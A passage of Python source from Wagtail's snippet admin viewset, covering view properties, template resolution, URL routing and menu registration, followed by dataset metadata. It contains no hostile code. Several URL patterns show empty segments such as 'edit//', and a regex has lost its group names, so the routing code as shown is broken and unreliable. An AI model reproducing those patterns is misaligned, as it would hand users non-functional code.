edit_handler=self._edit_handler,\n template_name=self.get_templates(\n \"revisions_compare\",\n fallback=self.revisions_compare_view_class.template_name,\n ),\n header_icon=self.icon,\n permission_policy=self.permission_policy,\n edit_url_name=self.get_url_name(\"edit\"),\n history_url_name=self.get_url_name(\"history\"),\n )\n\n @property\n def revisions_unschedule_view(self):\n return self.revisions_unschedule_view_class.as_view(\n model=self.model,\n template_name=self.get_templates(\n \"revisions_unschedule\",\n fallback=self.revisions_unschedule_view_class.template_name,\n ),\n header_icon=self.icon,\n permission_policy=self.permission_policy,\n edit_url_name=self.get_url_name(\"edit\"),\n history_url_name=self.get_url_name(\"history\"),\n revisions_unschedule_url_name=self.get_url_name(\"revisions_unschedule\"),\n )\n\n @property\n def unpublish_view(self):\n return self.unpublish_view_class.as_view(\n model=self.model,\n template_name=self.get_templates(\n \"unpublish\", fallback=self.unpublish_view_class.template_name\n ),\n header_icon=self.icon,\n permission_policy=self.permission_policy,\n index_url_name=self.get_url_name(\"list\"),\n edit_url_name=self.get_url_name(\"edit\"),\n unpublish_url_name=self.get_url_name(\"unpublish\"),\n usage_url_name=self.get_url_name(\"usage\"),\n )\n\n @property\n def preview_on_add_view(self):\n return self.preview_on_add_view_class.as_view(\n model=self.model,\n form_class=self.get_form_class(),\n )\n\n @property\n def preview_on_edit_view(self):\n return self.preview_on_edit_view_class.as_view(\n model=self.model,\n form_class=self.get_form_class(for_update=True),\n )\n\n @property\n def lock_view(self):\n return self.lock_view_class.as_view(\n model=self.model,\n permission_policy=self.permission_policy,\n success_url_name=self.get_url_name(\"edit\"),\n )\n\n @property\n def unlock_view(self):\n return self.unlock_view_class.as_view(\n model=self.model,\n permission_policy=self.permission_policy,\n success_url_name=self.get_url_name(\"edit\"),\n )\n\n @property\n def workflow_action_view(self):\n return self.workflow_action_view_class.as_view(\n model=self.model,\n redirect_url_name=self.get_url_name(\"edit\"),\n submit_url_name=self.get_url_name(\"workflow_action\"),\n )\n\n @property\n def collect_workflow_action_data_view(self):\n return self.collect_workflow_action_data_view_class.as_view(\n model=self.model,\n redirect_url_name=self.get_url_name(\"edit\"),\n submit_url_name=self.get_url_name(\"collect_workflow_action_data\"),\n )\n\n @property\n def confirm_workflow_cancellation_view(self):\n return self.confirm_workflow_cancellation_view_class.as_view(model=self.model)\n\n @property\n def workflow_status_view(self):\n return self.workflow_status_view_class.as_view(\n model=self.model,\n permission_policy=self.permission_policy,\n workflow_history_url_name=self.get_url_name(\"workflow_history\"),\n revisions_compare_url_name=self.get_url_name(\"revisions_compare\"),\n )\n\n @property\n def workflow_preview_view(self):\n return self.workflow_preview_view_class.as_view(model=self.model)\n\n @property\n def workflow_history_view(self):\n return self.workflow_history_view_class.as_view(\n model=self.model,\n template_name=self.get_templates(\n \"workflow_history/index\",\n fallback=self.workflow_history_view_class.template_name,\n ),\n header_icon=self.icon,\n permission_policy=self.permission_policy,\n workflow_history_url_name=self.get_url_name(\"workflow_history\"),\n workflow_history_detail_url_name=self.get_url_name(\n \"workflow_history_detail\"\n ),\n )\n\n @property\n def workflow_history_detail_view(self):\n return self.workflow_history_detail_view_class.as_view(\n model=self.model,\n template_name=self.get_templates(\n \"workflow_history/detail\",\n fallback=self.workflow_history_detail_view_class.template_name,\n ),\n object_icon=self.icon,\n permission_policy=self.permission_policy,\n workflow_history_url_name=self.get_url_name(\"workflow_history\"),\n )\n\n @property\n def redirect_to_edit_view(self):\n def redirect_to_edit(request, pk):\n return redirect(self.get_url_name(\"edit\"), pk, permanent=True)\n\n return redirect_to_edit\n\n @property\n def redirect_to_delete_view(self):\n def redirect_to_delete(request, pk):\n return redirect(self.get_url_name(\"delete\"), pk, permanent=True)\n\n return redirect_to_delete\n\n @property\n def redirect_to_usage_view(self):\n def redirect_to_usage(request, pk):\n return redirect(self.get_url_name(\"usage\"), pk, permanent=True)\n\n return redirect_to_usage\n\n @property\n def chooser_viewset(self):\n return self.chooser_viewset_class(\n self.get_chooser_admin_url_namespace(),\n model=self.model,\n url_prefix=self.get_chooser_admin_base_path(),\n icon=self.icon,\n per_page=self.chooser_per_page,\n )\n\n def get_icon(self):\n \"\"\"Returns the icon to be used for the admin views.\"\"\"\n return self.icon\n\n def get_menu_label(self):\n \"\"\"Returns the label text to be used for the menu item.\"\"\"\n return self.menu_label or self.model_opts.verbose_name_plural.title()\n\n def get_menu_name(self):\n \"\"\"Returns the name to be used for the menu item.\"\"\"\n return self.menu_name\n\n def get_menu_icon(self):\n \"\"\"Returns the icon to be used for the menu item.\"\"\"\n return self.get_icon()\n\n def get_menu_order(self):\n \"\"\"Returns the ordering number to be applied to the menu item.\"\"\"\n # By default, put it at the last item before Reports, whose order is 9000.\n return self.menu_order or 8999\n\n @property\n def menu_item_class(self):\n def is_shown(_self, request):\n return self.permission_policy.user_has_any_permission(\n request.user, (\"add\", \"change\", \"delete\")\n )\n\n return type(\n f\"{self.model.__name__}MenuItem\",\n (MenuItem,),\n {\"is_shown\": is_shown},\n )\n\n def get_menu_item(self, order=None):\n \"\"\"\n Returns a ``MenuItem`` instance to be registered with the Wagtail admin.\n\n The ``order`` parameter allows the method to be called from the outside (e.g.\n :class:`SnippetViewSetGroup`) to create a sub menu item with the correct order.\n \"\"\"\n return self.menu_item_class(\n label=self.get_menu_label(),\n url=reverse(self.get_url_name(\"index\")),\n name=self.get_menu_name(),\n icon_name=self.get_menu_icon(),\n order=order or self.get_menu_order(),\n )\n\n def get_menu_item_is_registered(self):\n return self.menu_item_is_registered\n\n def get_queryset(self, request):\n \"\"\"\n Returns a QuerySet of all model instances to be shown on the index view.\n If ``None`` is returned (the default), the logic in\n ``index_view.get_base_queryset()`` will be used instead.\n \"\"\"\n return None\n\n def get_export_filename(self):\n return self.export_filename or self.model_opts.db_table\n\n def get_templates(self, action=\"index\", fallback=\"\"):\n \"\"\"\n Utility function that provides a list of templates to try for a given\n view, when the template isn't overridden by one of the template\n attributes on the class.\n \"\"\"\n templates = [\n f\"{self.template_prefix}{self.app_label}/{self.model_name}/{action}.html\",\n f\"{self.template_prefix}{self.app_label}/{action}.html\",\n f\"{self.template_prefix}{action}.html\",\n ]\n if fallback:\n templates.append(fallback)\n return templates\n\n def get_index_template(self):\n \"\"\"\n Returns a template to be used when rendering ``index_view``. If a\n template is specified by the ``index_template_name`` attribute, that will\n be used. Otherwise, a list of preferred template names are returned.\n \"\"\"\n return self.index_template_name or self.get_templates(\"index\")\n\n def get_index_results_template(self):\n \"\"\"\n Returns a template to be used when rendering ``index_results_view``. If a\n template is specified by the ``index_results_template_name`` attribute, that will\n be used. Otherwise, a list of preferred template names are returned.\n \"\"\"\n return self.index_results_template_name or self.get_templates(\"index_results\")\n\n def get_create_template(self):\n \"\"\"\n Returns a template to be used when rendering ``create_view``. If a\n template is specified by the ``create_template_name`` attribute, that will\n be used. Otherwise, a list of preferred template names are returned.\n \"\"\"\n return self.create_template_name or self.get_templates(\"create\")\n\n def get_edit_template(self):\n \"\"\"\n Returns a template to be used when rendering ``edit_view``. If a\n template is specified by the ``edit_template_name`` attribute, that will\n be used. Otherwise, a list of preferred template names are returned.\n \"\"\"\n return self.edit_template_name or self.get_templates(\"edit\")\n\n def get_delete_template(self):\n \"\"\"\n Returns a template to be used when rendering ``delete_view``. If a\n template is specified by the ``delete_template_name`` attribute, that will\n be used. Otherwise, a list of preferred template names are returned.\n \"\"\"\n return self.delete_template_name or self.get_templates(\"delete\")\n\n def get_history_template(self):\n \"\"\"\n Returns a template to be used when rendering ``history_view``. If a\n template is specified by the ``history_template_name`` attribute, that will\n be used. Otherwise, a list of preferred template names are returned.\n \"\"\"\n return self.history_template_name or self.get_templates(\"history\")\n\n def get_inspect_template(self):\n \"\"\"\n Returns a template to be used when rendering ``inspect_view``. If a\n template is specified by the ``inspect_template_name`` attribute, that will\n be used. Otherwise, a list of preferred template names are returned.\n \"\"\"\n return self.inspect_template_name or self.get_templates(\n \"inspect\", fallback=self.inspect_view_class.template_name\n )\n\n def get_admin_url_namespace(self):\n \"\"\"Returns the URL namespace for the admin URLs for this model.\"\"\"\n if self.admin_url_namespace:\n return self.admin_url_namespace\n return f\"wagtailsnippets_{self.app_label}_{self.model_name}\"\n\n def get_admin_base_path(self):\n \"\"\"\n Returns the base path for the admin URLs for this model.\n The returned string must not begin or end with a slash.\n \"\"\"\n if self.base_url_path:\n return self.base_url_path.strip().strip(\"/\")\n return f\"snippets/{self.app_label}/{self.model_name}\"\n\n def get_chooser_admin_url_namespace(self):\n \"\"\"Returns the URL namespace for the chooser admin URLs for this model.\"\"\"\n if self.chooser_admin_url_namespace:\n return self.chooser_admin_url_namespace\n return f\"wagtailsnippetchoosers_{self.app_label}_{self.model_name}\"\n\n def get_chooser_admin_base_path(self):\n \"\"\"\n Returns the base path for the chooser admin URLs for this model.\n The returned string must not begin or end with a slash.\n \"\"\"\n if self.chooser_base_url_path:\n return self.chooser_base_url_path.strip().strip(\"/\")\n return f\"snippets/choose/{self.app_label}/{self.model_name}\"\n\n @property\n def url_finder_class(self):\n return type(\n \"_SnippetAdminURLFinder\", (SnippetAdminURLFinder,), {\"model\": self.model}\n )\n\n def get_urlpatterns(self):\n urlpatterns = super().get_urlpatterns() + [\n path(\"\", self.index_view, name=\"list\"),\n path(\"results/\", self.index_results_view, name=\"list_results\"),\n path(\"add/\", self.add_view, name=\"add\"),\n path(\"edit//\", self.edit_view, name=\"edit\"),\n path(\"delete//\", self.delete_view, name=\"delete\"),\n path(\"usage//\", self.usage_view, name=\"usage\"),\n path(\"history//\", self.history_view, name=\"history\"),\n ]\n\n if self.inspect_view_enabled:\n urlpatterns += [\n path(\"inspect//\", self.inspect_view, name=\"inspect\")\n ]\n\n if self.preview_enabled:\n urlpatterns += [\n path(\"preview/\", self.preview_on_add_view, name=\"preview_on_add\"),\n path(\n \"preview//\",\n self.preview_on_edit_view,\n name=\"preview_on_edit\",\n ),\n ]\n\n if self.revision_enabled:\n if self.preview_enabled:\n urlpatterns += [\n path(\n \"history//revisions//view/\",\n self.revisions_view,\n name=\"revisions_view\",\n )\n ]\n\n urlpatterns += [\n path(\n \"history//revisions//revert/\",\n self.revisions_revert_view,\n name=\"revisions_revert\",\n ),\n re_path(\n r\"history/(?P.+)/revisions/compare/(?Plive|earliest|\\d+)\\.\\.\\.(?Plive|latest|\\d+)/$\",\n self.revisions_compare_view,\n name=\"revisions_compare\",\n ),\n ]\n\n if self.draftstate_enabled:\n urlpatterns += [\n path(\n \"history//revisions//unschedule/\",\n self.revisions_unschedule_view,\n name=\"revisions_unschedule\",\n ),\n path(\"unpublish//\", self.unpublish_view, name=\"unpublish\"),\n ]\n\n if self.locking_enabled:\n urlpatterns += [\n path(\"lock//\", self.lock_view, name=\"lock\"),\n path(\"unlock//\", self.unlock_view, name=\"unlock\"),\n ]\n\n if self.workflow_enabled:\n urlpatterns += [\n path(\n \"workflow/action////\",\n self.workflow_action_view,\n name=\"workflow_action\",\n ),\n path(\n \"workflow/collect_action_data////\",\n self.collect_workflow_action_data_view,\n name=\"collect_workflow_action_data\",\n ),\n path(\n \"workflow/confirm_cancellation//\",\n self.confirm_workflow_cancellation_view,\n name=\"confirm_workflow_cancellation\",\n ),\n path(\n \"workflow/status//\",\n self.workflow_status_view,\n name=\"workflow_status\",\n ),\n path(\n \"workflow_history//\",\n self.workflow_history_view,\n name=\"workflow_history\",\n ),\n path(\n \"workflow_history//detail//\",\n self.workflow_history_detail_view,\n name=\"workflow_history_detail\",\n ),\n ]\n\n if self.preview_enabled:\n urlpatterns += [\n path(\n \"workflow/preview///\",\n self.workflow_preview_view,\n name=\"workflow_preview\",\n ),\n ]\n\n legacy_redirects = [\n # legacy URLs that could potentially collide if the pk matches one of the reserved names above\n # ('add', 'edit' etc) - redirect to the unambiguous version\n path(\"/\", self.redirect_to_edit_view),\n path(\"/delete/\", self.redirect_to_delete_view),\n path(\"/usage/\", self.redirect_to_usage_view),\n ]\n\n return urlpatterns + legacy_redirects\n\n def get_edit_handler(self):\n \"\"\"\n Returns the appropriate edit handler for this ``SnippetViewSet`` class.\n It can be defined either on the model itself or on the ``SnippetViewSet``,\n as the ``edit_handler`` or ``panels`` properties. Falls back to\n extracting panel / edit handler definitions from the model class.\n \"\"\"\n if hasattr(self, \"edit_handler\"):\n edit_handler = self.edit_handler\n elif hasattr(self, \"panels\"):\n panels = self.panels\n edit_handler = ObjectList(panels)\n elif hasattr(self.model, \"edit_handler\"):\n edit_handler = self.model.edit_handler\n elif hasattr(self.model, \"panels\"):\n panels = self.model.panels\n edit_handler = ObjectList(panels)\n else:\n exclude = self.get_exclude_form_fields()\n panels = extract_panel_definitions_from_model_class(\n self.model, exclude=exclude\n )\n edit_handler = ObjectList(panels)\n return edit_handler.bind_to_model(self.model)\n\n def get_form_class(self, for_update=False):\n return self._edit_handler.get_form_class()\n\n def register_model_check(self):\n def snippets_model_check(app_configs, **kwargs):\n return check_panels_in_model(self.model, \"snippets\")\n\n checks.register(snippets_model_check, \"panels\")\n\n def register_menu_item(self):\n if self.add_to_settings_menu:\n hooks.register(\"register_settings_menu_item\", self.get_menu_item)\n elif self.add_to_admin_menu:\n hooks.register(\"register_admin_menu_item\", self.get_menu_item)\n\n def on_register(self):\n super().on_register()\n # For convenience, attach viewset to the model class to allow accessing\n # the configuration of a given model.\n self.model.snippet_viewset = self\n viewsets.register(self.chooser_viewset)\n self.register_model_check()\n self.register_menu_item()\n\n\nclass SnippetViewSetGroup:\n \"\"\"\n A container for grouping together multiple SnippetViewSet instances. Creates\n a menu item with a submenu for accessing the listing pages of those instances.\n \"\"\"\n\n #: A list or tuple of :class:`SnippetViewSet` classes to be grouped together\n items = ()\n\n #: Register a custom menu item for the group in the admin's main menu.\n add_to_admin_menu = True\n\n # Undocumented for now, but it is technically possible to register the group's\n # menu item in the Settings menu instead of the main menu.\n add_to_settings_menu = False\n\n #: The icon used for the menu item that appears in Wagtail's sidebar.\n menu_icon = None\n\n #: The displayed label used for the menu item.\n #: If unset, the title-cased version of the first model's :attr:`~django.db.models.Options.app_label` will be used.\n menu_label = None\n\n #: The ``name`` argument passed to the ``MenuItem`` constructor, becoming the ``name`` attribute value for that instance.\n #: This can be useful when manipulating the menu items in a custom menu hook, e.g. :ref:`construct_main_menu`.\n #: If unset, a slugified version of the label is used.\n menu_name = None\n\n #: An integer determining the order of the menu item, 0 being the first place.\n menu_order = None\n\n def __init__(self):\n \"\"\"\n When initialising, instantiate the classes within 'items', and assign\n the instances to a ``viewsets`` attribute.\n \"\"\"\n self.viewsets = [\n viewset_class(menu_item_is_registered=True) for viewset_class in self.items\n ]\n\n def get_app_label_from_subitems(self):\n for instance in self.viewsets:\n return instance.app_label.title()\n return \"\"\n\n def get_menu_label(self):\n \"\"\"Returns the label text to be used for the menu item.\"\"\"\n return self.menu_label or self.get_app_label_from_subitems()\n\n def get_menu_name(self):\n \"\"\"Returns the name to be used for the menu item.\"\"\"\n return self.menu_name\n\n def get_menu_icon(self):\n \"\"\"Returns the icon to be used for the menu item.\"\"\"\n return self.menu_icon or \"folder-open-inverse\"\n\n def get_menu_order(self):\n \"\"\"Returns the ordering number to be applied to the menu item.\"\"\"\n return self.menu_order or 8999\n\n def get_submenu_items(self):\n menu_items = []\n item_order = 1\n for viewset in self.viewsets:\n menu_items.append(viewset.get_menu_item(order=item_order))\n item_order += 1\n return menu_items\n\n def get_menu_item(self):\n \"\"\"Returns a ``MenuItem`` instance to be registered with the Wagtail admin.\"\"\"\n if not self.viewsets:\n return None\n submenu = Menu(items=self.get_submenu_items())\n return SubmenuMenuItem(\n label=self.get_menu_label(),\n menu=submenu,\n name=self.get_menu_name(),\n icon_name=self.get_menu_icon(),\n order=self.get_menu_order(),\n )\n\n def register_menu_item(self):\n if self.add_to_settings_menu:\n hooks.register(\"register_settings_menu_item\", self.get_menu_item)\n elif self.add_to_admin_menu:\n hooks.register(\"register_admin_menu_item\", self.get_menu_item)\n\n def on_register(self):\n self.register_menu_item()\n", "sub_path": "wagtail/snippets/views/snippets.py", "file_name": "snippets.py", "file_ext": "py", "file_size_in_byte": 63703, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.apps.apps.get_model", "line_number": 65, "usage_type": "call"}, {"api_name": "django.apps.apps", "line_number": 65, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 67, "usage_type": "name"}, {"api_name": "wagtail.snippets.models.get_snippet_models", "line_number": 68, "usage_type": "call"}, {"api_name": "django.http.Http404", "line_number": 70, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.IndexView", "line_number": 78, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic", "line_number": 78, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 79, "usage_type": "call"}, {"api_name": "django.utils.text.capfirst", "line_number": 91, "usage_type": "call"}, {"api_name": "wagtail.snippets.models.get_snippet_models", "line_number": 95, "usage_type": "call"}, {"api_name": "wagtail.snippets.permissions.user_can_edit_snippet_type", "line_number": 96, "usage_type": "call"}, {"api_name": "django.core.exceptions.PermissionDenied", "line_number": 101, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 105, "usage_type": "call"}, {"api_name": "wagtail.admin.ui.tables.TitleColumn", "line_number": 112, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 114, "usage_type": "call"}, {"api_name": "wagtail.admin.ui.tables.Column", "line_number": 118, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 120, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 127, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 133, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 139, "usage_type": "name"}, {"api_name": "wagtail.admin.ui.tables.TitleColumn", "line_number": 154, "usage_type": "name"}, {"api_name": "wagtail.admin.views.mixins.SpreadsheetExportMixin", "line_number": 159, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.IndexViewOptionalFeaturesMixin", "line_number": 160, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic", "line_number": 160, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.IndexView", "line_number": 161, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic", "line_number": 161, "usage_type": "name"}, {"api_name": "wagtail.admin.ui.tables.InlineActionsTable", "line_number": 168, "usage_type": "name"}, {"api_name": "wagtail.admin.ui.tables.BulkActionsCheckboxColumn", "line_number": 184, "usage_type": "call"}, {"api_name": "wagtail.models.Locale.objects.all", "line_number": 206, "usage_type": "call"}, {"api_name": "wagtail.models.Locale.objects", "line_number": 206, "usage_type": "attribute"}, {"api_name": "wagtail.models.Locale", "line_number": 206, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.CreateEditViewOptionalFeaturesMixin", "line_number": 219, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic", "line_number": 219, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.CreateView", "line_number": 219, "usage_type": "attribute"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 224, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 233, "usage_type": "call"}, {"api_name": "wagtail.models.Locale.get_default", "line_number": 244, "usage_type": "call"}, {"api_name": "wagtail.models.Locale", "line_number": 244, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 247, "usage_type": "call"}, {"api_name": "wagtail.snippets.action_menu.SnippetActionMenu", "line_number": 250, "usage_type": "call"}, {"api_name": "wagtail.snippets.side_panels.SnippetSidePanels", "line_number": 273, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 296, "usage_type": "call"}, {"api_name": "wagtail.models.Locale.objects.all", "line_number": 300, "usage_type": "call"}, {"api_name": "wagtail.models.Locale.objects", "line_number": 300, "usage_type": "attribute"}, {"api_name": "wagtail.models.Locale", "line_number": 300, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.CreateEditViewOptionalFeaturesMixin", "line_number": 306, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic", "line_number": 306, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.EditView", "line_number": 306, "usage_type": "attribute"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 314, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 323, "usage_type": "call"}, {"api_name": "django.contrib.admin.utils.quote", "line_number": 323, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 326, "usage_type": "call"}, {"api_name": "django.contrib.admin.utils.quote", "line_number": 326, "usage_type": "call"}, {"api_name": "wagtail.snippets.action_menu.SnippetActionMenu", "line_number": 329, "usage_type": "call"}, {"api_name": "wagtail.snippets.side_panels.SnippetSidePanels", "line_number": 344, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 374, "usage_type": "call"}, {"api_name": "django.contrib.admin.utils.quote", "line_number": 376, "usage_type": "call"}, {"api_name": "wagtail.admin.views.generic.DeleteView", "line_number": 387, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic", "line_number": 387, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 389, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 400, "usage_type": "call"}, {"api_name": "django.utils.text.capfirst", "line_number": 401, "usage_type": "call"}, {"api_name": "wagtail.admin.views.generic.UsageView", "line_number": 406, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic", "line_number": 406, "usage_type": "name"}, {"api_name": "wagtail.admin.filters.WagtailFilterSet", "line_number": 413, "usage_type": "name"}, {"api_name": "django_filters.ChoiceFilter", "line_number": 414, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 415, "usage_type": "call"}, {"api_name": "wagtail.log_actions.registry.get_choices", "line_number": 416, "usage_type": "attribute"}, {"api_name": "wagtail.log_actions.registry", "line_number": 416, "usage_type": "name"}, {"api_name": "django_filters.ModelChoiceFilter", "line_number": 418, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 419, "usage_type": "call"}, {"api_name": "wagtail.models.audit_log.ModelLogEntry.objects.all", "line_number": 421, "usage_type": "call"}, {"api_name": "wagtail.models.audit_log.ModelLogEntry.objects", "line_number": 421, "usage_type": "attribute"}, {"api_name": "wagtail.models.audit_log.ModelLogEntry", "line_number": 421, "usage_type": "name"}, {"api_name": "django_filters.DateFromToRangeFilter", "line_number": 423, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 424, "usage_type": "call"}, {"api_name": "wagtail.admin.filters.DateRangePickerWidget", "line_number": 424, "usage_type": "name"}, {"api_name": "wagtail.models.audit_log.ModelLogEntry", "line_number": 428, "usage_type": "name"}, {"api_name": "wagtail.admin.ui.tables.Column", "line_number": 432, "usage_type": "name"}, {"api_name": "wagtail.models.RevisionMixin", "line_number": 442, "usage_type": "argument"}, {"api_name": "wagtail.models.DraftStateMixin", "line_number": 443, "usage_type": "argument"}, {"api_name": "wagtail.models.PreviewableMixin", "line_number": 444, "usage_type": "argument"}, {"api_name": "wagtail.admin.views.reports.base.ReportView", "line_number": 451, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 461, "usage_type": "call"}, {"api_name": "wagtail.admin.ui.tables.InlineActionsTable", "line_number": 466, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 474, "usage_type": "call"}, {"api_name": "django.contrib.admin.utils.unquote", "line_number": 474, "usage_type": "call"}, {"api_name": "wagtail.models.DraftStateMixin", "line_number": 475, "usage_type": "argument"}, {"api_name": "django.utils.translation.gettext", "line_number": 489, "usage_type": "call"}, {"api_name": "wagtail.admin.ui.tables.UserColumn", "line_number": 491, "usage_type": "call"}, {"api_name": "wagtail.admin.ui.tables.DateColumn", "line_number": 492, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 492, "usage_type": "call"}, {"api_name": "wagtail.log_actions.registry.get_logs_for_instance", "line_number": 503, "usage_type": "call"}, {"api_name": "wagtail.log_actions.registry", "line_number": 503, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.InspectView", "line_number": 508, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic", "line_number": 508, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.preview.PreviewOnCreate", "line_number": 513, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.preview.PreviewOnEdit", "line_number": 517, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.permissions.PermissionCheckedMixin", "line_number": 521, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.preview.PreviewRevision", "line_number": 521, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.permissions.PermissionCheckedMixin", "line_number": 525, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.RevisionsCompareView", "line_number": 525, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic", "line_number": 525, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext", "line_number": 530, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 536, "usage_type": "call"}, {"api_name": "wagtail.admin.views.generic.permissions.PermissionCheckedMixin", "line_number": 541, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.UnpublishView", "line_number": 541, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic", "line_number": 541, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.permissions.PermissionCheckedMixin", "line_number": 545, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.RevisionsUnscheduleView", "line_number": 545, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic", "line_number": 545, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.permissions.PermissionCheckedMixin", "line_number": 549, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.lock.LockView", "line_number": 549, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic.lock", "line_number": 549, "usage_type": "name"}, {"api_name": "wagtail.models.WorkflowMixin", "line_number": 557, "usage_type": "argument"}, {"api_name": "wagtail.admin.views.generic.permissions.PermissionCheckedMixin", "line_number": 568, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.lock.UnlockView", "line_number": 568, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic.lock", "line_number": 568, "usage_type": "name"}, {"api_name": "wagtail.models.WorkflowMixin", "line_number": 581, "usage_type": "argument"}, {"api_name": "wagtail.admin.views.generic.workflow.WorkflowAction", "line_number": 591, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic.workflow", "line_number": 591, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.workflow.CollectWorkflowActionData", "line_number": 595, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic.workflow", "line_number": 595, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.workflow.ConfirmWorkflowCancellation", "line_number": 599, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic.workflow", "line_number": 599, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.permissions.PermissionCheckedMixin", "line_number": 603, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.workflow.WorkflowStatus", "line_number": 603, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic.workflow", "line_number": 603, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.workflow.PreviewRevisionForTask", "line_number": 607, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic.workflow", "line_number": 607, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.permissions.PermissionCheckedMixin", "line_number": 611, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.history.WorkflowHistoryView", "line_number": 611, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic.history", "line_number": 611, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.permissions.PermissionCheckedMixin", "line_number": 616, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.history.WorkflowHistoryDetailView", "line_number": 616, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic.history", "line_number": 616, "usage_type": "name"}, {"api_name": "wagtail.admin.viewsets.model.ModelViewSet", "line_number": 621, "usage_type": "name"}, {"api_name": "wagtail.snippets.views.chooser.SnippetChooserViewSet", "line_number": 803, "usage_type": "name"}, {"api_name": "django.core.exceptions.ImproperlyConfigured", "line_number": 834, "usage_type": "call"}, {"api_name": "wagtail.models.PreviewableMixin", "line_number": 842, "usage_type": "argument"}, {"api_name": "wagtail.models.RevisionMixin", "line_number": 843, "usage_type": "argument"}, {"api_name": "wagtail.models.DraftStateMixin", "line_number": 844, "usage_type": "argument"}, {"api_name": "wagtail.models.WorkflowMixin", "line_number": 845, "usage_type": "argument"}, {"api_name": "wagtail.models.LockableMixin", "line_number": 846, "usage_type": "argument"}, {"api_name": "wagtail.admin.ui.tables.LiveStatusTagColumn", "line_number": 861, "usage_type": "call"}, {"api_name": "wagtail.admin.views.generic.RevisionsRevertMixin", "line_number": 878, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic", "line_number": 878, "usage_type": "name"}, {"api_name": "wagtail.permissions.ModelPermissionPolicy", "line_number": 885, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 1200, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 1207, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 1214, "usage_type": "call"}, {"api_name": "wagtail.admin.menu.MenuItem", "line_number": 1258, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 1271, "usage_type": "call"}, {"api_name": "wagtail.snippets.models.SnippetAdminURLFinder", "line_number": 1397, 